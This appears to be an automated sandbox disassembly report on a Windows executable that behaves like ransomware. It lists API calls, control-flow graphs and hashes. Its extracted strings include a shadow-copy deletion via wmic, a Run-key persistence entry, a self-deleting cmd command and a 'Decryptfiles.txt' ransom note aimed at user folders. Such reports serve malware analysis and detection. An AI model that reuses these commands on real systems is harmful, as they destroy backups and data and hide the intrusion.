                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$DebuggerPresent$HandleValue$CreateFileModuleNameOpenQuery$ProcessSleep
                                                                                                      • String ID: Private$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\SoftwareClient$XPSUDTARW$cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "%s"
                                                                                                      • API String ID: 2776164779-81697169
                                                                                                      • Opcode ID: b3114b62ad69e85d12fe8ae6550f4691e5e4a937e95b777713215ffd56eb2e73
                                                                                                      • Instruction ID: 30795ca5b4c7a5f770710e9699d5b12768369a977aaa765ce33a85c934cb76d3
                                                                                                      • Opcode Fuzzy Hash: b3114b62ad69e85d12fe8ae6550f4691e5e4a937e95b777713215ffd56eb2e73
                                                                                                      • Instruction Fuzzy Hash: 45E13DB0D052189EEF209F21DC59BAEBBB5EF44304F1012D9E50CBA291D7B65A98CF91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 459 e3a1d0-e3a29d call e8e880 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call e48780 call e8c795 call e43190 call e4abe0 470 e3a2a3-e3a712 call e8f780 call e43050 call e48780 * 8 call e4a270 call e4cfb0 call e4a270 call e4cfb0 call e4a270 * 3 call e4cfb0 call e4a270 call e4cfb0 call e4a270 * 3 call e4cfb0 call e4a270 call e4cfb0 call e4a270 * 3 call e4cfb0 call e4a270 call e4cfb0 call e4a270 * 3 459->470 471 e3aa6a-e3aa70 459->471 554 e3a743-e3a76b 470->554 555 e3a714-e3a723 470->555 472 e3aa72-e3aa7e 471->472 473 e3aa9a-e3aab5 call e8d512 471->473 476 e3aa90-e3aa97 call e8d9bb 472->476 477 e3aa80-e3aa8e 472->477 476->473 477->476 481 e3aac0-e3aac5 call e9c3be 477->481 556 e3a76d-e3a77c 554->556 557 e3a79c-e3a7c4 554->557 558 e3a725-e3a733 555->558 559 e3a739-e3a740 call e8d9bb 555->559 560 e3a792-e3a799 call e8d9bb 556->560 561 e3a77e-e3a78c 556->561 562 e3a7c6-e3a7d5 557->562 563 e3a7f5-e3a81d 557->563 558->559 564 e3aab6 call e9c3be 558->564 559->554 560->557 561->560 561->564 568 e3a7d7-e3a7e5 562->568 569 e3a7eb-e3a7f2 call e8d9bb 562->569 570 e3a81f-e3a82e 563->570 571 e3a84e-e3a876 563->571 576 e3aabb call e9c3be 564->576 568->564 568->569 569->563 578 e3a830-e3a83e 570->578 579 e3a844-e3a84b call e8d9bb 570->579 573 e3a8a7-e3a8cf 571->573 574 e3a878-e3a887 571->574 584 e3a8d1-e3a8e0 573->584 585 e3a900-e3a928 573->585 581 e3a889-e3a897 574->581 582 e3a89d-e3a8a4 call e8d9bb 574->582 576->481 578->564 578->579 579->571 581->564 581->582 582->573 589 e3a8e2-e3a8f0 584->589 590 e3a8f6-e3a8fd call e8d9bb 584->590 591 e3a92a-e3a939 585->591 592 e3a959-e3a981 585->592 589->564 589->590 590->585 593 e3a93b-e3a949 591->593 594 e3a94f-e3a956 call e8d9bb 591->594 595 e3a983-e3a992 592->595 596 e3a9b2-e3aa0d call e42f70 call e48780 call e462f0 call e39c30 592->596 593->564 593->594 594->592 600 e3a994-e3a9a2 595->600 601 e3a9a8-e3a9af call e8d9bb 595->601 613 e3aa12-e3aa23 596->613 600->564 600->601 601->596 615 e3aa25-e3aa31 613->615 616 e3aa4d-e3aa65 call e3aad0 613->616 617 e3aa43-e3aa4a call e8d9bb 615->617 618 e3aa33-e3aa41 615->618 616->471 617->616 618->576 618->617
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,AB1AAB9C,00000000,?,?,00000000,00EB4143,000000FF,?,AB1AAB9C,00EE4728,Could not create child process), ref: 00E3A212
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00E3A21B
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,?,?,00000000,00EB4143,000000FF,?,AB1AAB9C,00EE4728,Could not create child process,?,?,?,?,00000020), ref: 00E3A229
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00E3A22C
                                                                                                        • Part of subcall function 00E48780: Concurrency::cancel_current_task.LIBCPMT ref: 00E488B3
                                                                                                        • Part of subcall function 00E3AAD0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E3AB77
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc$Concurrency::cancel_current_taskIos_base_dtorstd::ios_base::_
                                                                                                      • String ID: 0?$0?$0?$0?$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$Could not create child process$CreateProcess failed (%d).$D$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$\..$\Windows\$\system32\$\wbem\$\wmic.exe$c:\$kernel32.dll$shadowcopy delete
                                                                                                      • API String ID: 1382772914-1758836072
                                                                                                      • Opcode ID: ecd4408f148f5a64ec6488012309a1c08a8f111c8750548de02f3d470c4a0dbf
                                                                                                      • Instruction ID: 7faa13cf1fcc509a68806d0875ac217835ab770170603c184f83068297effd78
                                                                                                      • Opcode Fuzzy Hash: ecd4408f148f5a64ec6488012309a1c08a8f111c8750548de02f3d470c4a0dbf
                                                                                                      • Instruction Fuzzy Hash: 89327D30E002188BDF24DBA4C9997DDBBB6EB45304F5491E9E009B7292D7755BC8CFA2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 667 e337c0-e337f0 CreateEventW 668 e337f2-e3381f GetLastError 667->668 669 e33828-e33840 CreateEventW 667->669 675 e33916-e3391e call e33480 668->675 676 e33825 668->676 670 e33842-e33873 GetLastError 669->670 671 e3387c-e33893 call e98ef7 669->671 680 e33923-e3392b call e33480 670->680 681 e33879 670->681 674 e33898-e338a6 671->674 678 e338f3-e338f5 674->678 679 e338a8-e338bb GetLastError 674->679 675->680 676->669 684 e33903-e33913 call e8d512 678->684 685 e338f7-e33901 WaitForSingleObject CloseHandle 678->685 690 e338c0-e338c8 679->690 691 e338bd-e338be CloseHandle 679->691 686 e33930-e3397e call e33480 SetEvent call e4dcc0 680->686 681->671 685->684 696 e33981-e339af SetEvent SleepEx 686->696 694 e338ca-e338cb CloseHandle 690->694 695 e338cd-e338f1 690->695 691->690 694->695 695->678 695->686
                                                                                                      APIs
                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00E337E3
                                                                                                      • GetLastError.KERNEL32 ref: 00E337F2
                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00E33830
                                                                                                      • GetLastError.KERNEL32 ref: 00E33842
                                                                                                      • GetLastError.KERNEL32(?,?,?), ref: 00E338A8
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E338BE
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E338CB
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00E338FA
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E33901
                                                                                                      • SetEvent.KERNEL32(?,AB1AAB9C,75572EE0,?,00000000,00EB31FD,000000FF), ref: 00E33974
                                                                                                      • SetEvent.KERNEL32(@a), ref: 00E3398D
                                                                                                      • SleepEx.KERNEL32(000000FF,00000001), ref: 00E33997
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Event$CloseErrorHandleLast$Create$ObjectSingleSleepWait
                                                                                                      • String ID: @a$thread$thread.entry_event$thread.exit_event
                                                                                                      • API String ID: 301388165-2334419641
                                                                                                      • Opcode ID: 48a65594214b09c191fee8a0857abd33b5a104c59448380762fa99646c72605e
                                                                                                      • Instruction ID: c02c1d003fa7fe8a092e0d2ccb9838258d23d28d6640ba5b0142a10158bd8edc
                                                                                                      • Opcode Fuzzy Hash: 48a65594214b09c191fee8a0857abd33b5a104c59448380762fa99646c72605e
                                                                                                      • Instruction Fuzzy Hash: E4514075E00219EFDB109FA5CC89BAEBBB4EF49710F10425AE915BB390D7B09A44CB90
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E3F310: GetTempPathA.KERNEL32(00000104,?,?,?,?,AB1AAB9C,00000000), ref: 00E3F40B
                                                                                                        • Part of subcall function 00E3F810: SHGetKnownFolderPath.SHELL32(00EBB350,-00000001,-00000001,00000000,AB1AAB9C,?), ref: 00E3F9AC
                                                                                                        • Part of subcall function 00E3F810: CoTaskMemFree.OLE32(00000000,00000000,-00000002), ref: 00E3F9DB
                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00E3FDC2
                                                                                                      • __Mtx_init_in_situ.LIBCPMT ref: 00E3FDD8
                                                                                                        • Part of subcall function 00E48340: Concurrency::cancel_current_task.LIBCPMT ref: 00E48485
                                                                                                        • Part of subcall function 00E3DF60: GetLastError.KERNEL32(AB1AAB9C,755720D0,00000000,00000000), ref: 00E3DFDB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$Concurrency::cancel_current_taskCopyErrorFileFolderFreeKnownLastMtx_init_in_situTaskTemp
                                                                                                      • String ID: (_$.$Desktop$Documents$Downloads$Pictures$Videos$\Decryptfiles.txt$here
                                                                                                      • API String ID: 877804643-2413492679
                                                                                                      • Opcode ID: a9323b2fcb86750542bf7b27d3ed66707066a5317b8fe98cead8fb6d7ccb6f31
                                                                                                      • Instruction ID: 00f55bbb934326aaba868fc458438d9a201c99132d0413f30905cca484f84f6b
                                                                                                      • Opcode Fuzzy Hash: a9323b2fcb86750542bf7b27d3ed66707066a5317b8fe98cead8fb6d7ccb6f31
                                                                                                      • Instruction Fuzzy Hash: 5EB2A930D44258DAEF24DB64DD89BEEB7B4AF51304F6052D8E009B7292EB786BC4CB51

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00E785F0: BCryptGenRandom.BCRYPT(00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78672
                                                                                                        • Part of subcall function 00E785F0: BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78690
                                                                                                      • RegCreateKeyExW.KERNELBASE(80000001,software\SoftwareClient,00000000,00000000,00000000,000F003F,00000000,?,00000000,-00000078,-00000077,?,?,?,?,?), ref: 00E38741
                                                                                                      • RegSetValueExW.KERNELBASE(?,Public,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00E387A5
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00ED5B38,00000800,00000000), ref: 00E387C9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCrypt$AlgorithmCreateProviderRandomValue
                                                                                                      • String ID: 8[$<- :sizeof key$Error opening key.$Error writing to Registry.$Public$Success opening key.$Success writing to Registry.$software\SoftwareClient
                                                                                                      • API String ID: 2546756072-692627530
                                                                                                      • Opcode ID: aa2dec9890e9dfa944192f58291057766d7da682689c165f65254ffee8ae35f2
                                                                                                      • Instruction ID: 3617937e190247ba029dbc278e03d17123aae21aed1aa4f2112092e386e7b38c
                                                                                                      • Opcode Fuzzy Hash: aa2dec9890e9dfa944192f58291057766d7da682689c165f65254ffee8ae35f2
                                                                                                      • Instruction Fuzzy Hash: 6C125870905258EBDB25DF54CD5ABCEBBF8AB44304F5091D9E4487B281EBB06B88CF61

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1208 ea7f05-ea7f15 1209 ea7f2f-ea7f31 1208->1209 1210 ea7f17-ea7f2a call e9ca2a call e9ca3d 1208->1210 1212 ea8299-ea82a6 call e9ca2a call e9ca3d 1209->1212 1213 ea7f37-ea7f3d 1209->1213 1226 ea82b1 1210->1226 1231 ea82ac call e9c3ae 1212->1231 1213->1212 1216 ea7f43-ea7f6e 1213->1216 1216->1212 1219 ea7f74-ea7f7d 1216->1219 1222 ea7f7f-ea7f92 call e9ca2a call e9ca3d 1219->1222 1223 ea7f97-ea7f99 1219->1223 1222->1231 1224 ea7f9f-ea7fa3 1223->1224 1225 ea8295-ea8297 1223->1225 1224->1225 1229 ea7fa9-ea7fad 1224->1229 1230 ea82b4-ea82b9 1225->1230 1226->1230 1229->1222 1234 ea7faf-ea7fc6 1229->1234 1231->1226 1237 ea7fc8-ea7fcb 1234->1237 1238 ea7fe3-ea7fec 1234->1238 1239 ea7fcd-ea7fd3 1237->1239 1240 ea7fd5-ea7fde 1237->1240 1241 ea800a-ea8014 1238->1241 1242 ea7fee-ea8005 call e9ca2a call e9ca3d call e9c3ae 1238->1242 1239->1240 1239->1242 1245 ea807f-ea8099 1240->1245 1243 ea801b-ea8039 call ea6049 call ea4646 * 2 1241->1243 1244 ea8016-ea8018 1241->1244 1270 ea81cc 1242->1270 1278 ea803b-ea8051 call e9ca3d call e9ca2a 1243->1278 1279 ea8056-ea807c call ea8455 1243->1279 1244->1243 1247 ea809f-ea80af 1245->1247 1248 ea816d-ea8176 call eae7a2 1245->1248 1247->1248 1251 ea80b5-ea80b7 1247->1251 1261 ea8178-ea818a 1248->1261 1262 ea81e9 1248->1262 1251->1248 1255 ea80bd-ea80e3 1251->1255 1255->1248 1259 ea80e9-ea80fc 1255->1259 1259->1248 1266 ea80fe-ea8100 1259->1266 1261->1262 1264 ea818c-ea819b GetConsoleMode 1261->1264 1268 ea81ed-ea8205 ReadFile 1262->1268 1264->1262 1269 ea819d-ea81a1 1264->1269 1266->1248 1271 ea8102-ea812d 1266->1271 1273 ea8261-ea826c GetLastError 1268->1273 1274 ea8207-ea820d 1268->1274 1269->1268 1275 ea81a3-ea81bd ReadConsoleW 1269->1275 1276 ea81cf-ea81d9 call ea4646 1270->1276 1271->1248 1277 ea812f-ea8142 1271->1277 1280 ea826e-ea8280 call e9ca3d call e9ca2a 1273->1280 1281 ea8285-ea8288 1273->1281 1274->1273 1282 ea820f 1274->1282 1285 ea81de-ea81e7 1275->1285 1286 ea81bf GetLastError 1275->1286 1276->1230 1277->1248 1290 ea8144-ea8146 1277->1290 1278->1270 1279->1245 1280->1270 1287 ea828e-ea8290 1281->1287 1288 ea81c5-ea81cb call e9ca07 1281->1288 1284 ea8212-ea8224 1282->1284 1284->1276 1295 ea8226-ea822a 1284->1295 1285->1284 1286->1288 1287->1276 1288->1270 1290->1248 1298 ea8148-ea8168 1290->1298 1301 ea822c-ea823c call ea7c2e 1295->1301 1302 ea8243-ea824e 1295->1302 1298->1248 1313 ea823f-ea8241 1301->1313 1307 ea825a-ea825f call ea7a86 1302->1307 1308 ea8250 call ea7d85 1302->1308 1314 ea8255-ea8258 1307->1314 1308->1314 1313->1276 1314->1313
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3907804496
                                                                                                      • Opcode ID: b15aaac692a0be8de9ee7c6ff2165f2da56f7649318a78b7ed29b21f36113be6
                                                                                                      • Instruction ID: ad0e2d81373be13b71ebe9afe9bcdb84a93e25e9e34756d133df063107d5b63d
                                                                                                      • Opcode Fuzzy Hash: b15aaac692a0be8de9ee7c6ff2165f2da56f7649318a78b7ed29b21f36113be6
                                                                                                      • Instruction Fuzzy Hash: 6DC1D370A08249AFDF11DFA8C981BAE7BF4AF1E304F145199E455BF252CB70AE01CB61

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1316 eb0964-eb0994 call eb06c7 1319 eb09af-eb09bb call eabeab 1316->1319 1320 eb0996-eb09a1 call e9ca2a 1316->1320 1325 eb09bd-eb09d2 call e9ca2a call e9ca3d 1319->1325 1326 eb09d4-eb0a1d call eb0632 1319->1326 1327 eb09a3-eb09aa call e9ca3d 1320->1327 1325->1327 1335 eb0a8a-eb0a93 GetFileType 1326->1335 1336 eb0a1f-eb0a28 1326->1336 1337 eb0c86-eb0c8c 1327->1337 1338 eb0adc-eb0adf 1335->1338 1339 eb0a95-eb0ac6 GetLastError call e9ca07 CloseHandle 1335->1339 1341 eb0a2a-eb0a2e 1336->1341 1342 eb0a5f-eb0a85 GetLastError call e9ca07 1336->1342 1344 eb0ae8-eb0aee 1338->1344 1345 eb0ae1-eb0ae6 1338->1345 1339->1327 1353 eb0acc-eb0ad7 call e9ca3d 1339->1353 1341->1342 1346 eb0a30-eb0a5d call eb0632 1341->1346 1342->1327 1350 eb0af2-eb0b40 call eabdf4 1344->1350 1351 eb0af0 1344->1351 1345->1350 1346->1335 1346->1342 1359 eb0b42-eb0b4e call eb0843 1350->1359 1360 eb0b50-eb0b74 call eb03e9 1350->1360 1351->1350 1353->1327 1359->1360 1365 eb0b78-eb0b82 call ea5ce9 1359->1365 1366 eb0b87-eb0bca 1360->1366 1367 eb0b76 1360->1367 1365->1337 1369 eb0beb-eb0bf9 1366->1369 1370 eb0bcc-eb0bd0 1366->1370 1367->1365 1373 eb0bff-eb0c03 1369->1373 1374 eb0c84 1369->1374 1370->1369 1372 eb0bd2-eb0be6 1370->1372 1372->1369 1373->1374 1375 eb0c05-eb0c38 CloseHandle call eb0632 1373->1375 1374->1337 1378 eb0c3a-eb0c66 GetLastError call e9ca07 call eabfb4 1375->1378 1379 eb0c6c-eb0c80 1375->1379 1378->1379 1379->1374
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EB0632: CreateFileW.KERNELBASE(00000000,?,?,,?,?,00000000,?,00EB0A0D,00000000,0000000C), ref: 00EB064F
                                                                                                      • GetLastError.KERNEL32 ref: 00EB0A78
                                                                                                      • __dosmaperr.LIBCMT ref: 00EB0A7F
                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00EB0A8B
                                                                                                      • GetLastError.KERNEL32 ref: 00EB0A95
                                                                                                      • __dosmaperr.LIBCMT ref: 00EB0A9E
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EB0ABE
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EB0C08
                                                                                                      • GetLastError.KERNEL32 ref: 00EB0C3A
                                                                                                      • __dosmaperr.LIBCMT ref: 00EB0C41
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                      • String ID: H
                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                      • Opcode ID: 9431094f09eca84224b1fa5333fbc8668f6bf1d451ba94955bad72f6ff5ac8f7
                                                                                                      • Instruction ID: 678ad77177a9cbbb45e5190479b9c63a96c04b55226326013440cb7ae6adb884
                                                                                                      • Opcode Fuzzy Hash: 9431094f09eca84224b1fa5333fbc8668f6bf1d451ba94955bad72f6ff5ac8f7
                                                                                                      • Instruction Fuzzy Hash: 8BA13532A141488FDF19EF68D8927EF7BA0AB06328F141259F811BF292C771AD06CB51

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1384 e33fc0-e34013 1385 e34060-e340c2 TlsGetValue TlsSetValue 1384->1385 1386 e34015-e34018 1384->1386 1387 e340d1 1385->1387 1388 e340c4-e340cf EnterCriticalSection 1385->1388 1389 e34025 1386->1389 1390 e3401a-e34023 EnterCriticalSection 1386->1390 1391 e340d5-e340e6 call e341c0 1387->1391 1388->1391 1392 e34027-e3402f 1389->1392 1390->1392 1396 e340eb-e340ed 1391->1396 1394 e34031-e34038 SetEvent 1392->1394 1395 e3403e-e34042 1392->1395 1394->1395 1397 e34044-e34048 1395->1397 1398 e3404e-e34050 1395->1398 1399 e34129-e3412d 1396->1399 1400 e340ef 1396->1400 1397->1398 1401 e3404a 1397->1401 1402 e34052-e34053 LeaveCriticalSection 1398->1402 1403 e34059-e3405b 1398->1403 1406 e34138-e3414f TlsSetValue call e45f70 1399->1406 1407 e3412f-e34132 LeaveCriticalSection 1399->1407 1405 e340f0-e34102 1400->1405 1401->1398 1402->1403 1404 e34165-e34180 call e8d512 1403->1404 1410 e34115-e34127 call e341c0 1405->1410 1411 e34104-e34108 1405->1411 1416 e34151-e34161 call e7afb0 1406->1416 1407->1406 1410->1399 1410->1405 1411->1410 1414 e3410a-e34111 EnterCriticalSection 1411->1414 1414->1410 1420 e34163 1416->1420 1420->1404
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,AB1AAB9C), ref: 00E3401B
                                                                                                      • SetEvent.KERNEL32(?), ref: 00E34038
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E34053
                                                                                                      • TlsGetValue.KERNEL32(AB1AAB9C), ref: 00E340A2
                                                                                                      • TlsSetValue.KERNEL32(?), ref: 00E340B5
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00E340C5
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 00E3410B
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 00E34132
                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,?), ref: 00E34141
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterValue$Leave$Event
                                                                                                      • String ID: @a
                                                                                                      • API String ID: 3315918275-1769526761
                                                                                                      • Opcode ID: 86c317fdb646c190aba121348fcdd5224c30f74171e74cb084a125ba900d3b1d
                                                                                                      • Instruction ID: 31afaf6623b02c9ced39fcd10eb47f1c7ff017ca0727466a5f01c6ff84b716d2
                                                                                                      • Opcode Fuzzy Hash: 86c317fdb646c190aba121348fcdd5224c30f74171e74cb084a125ba900d3b1d
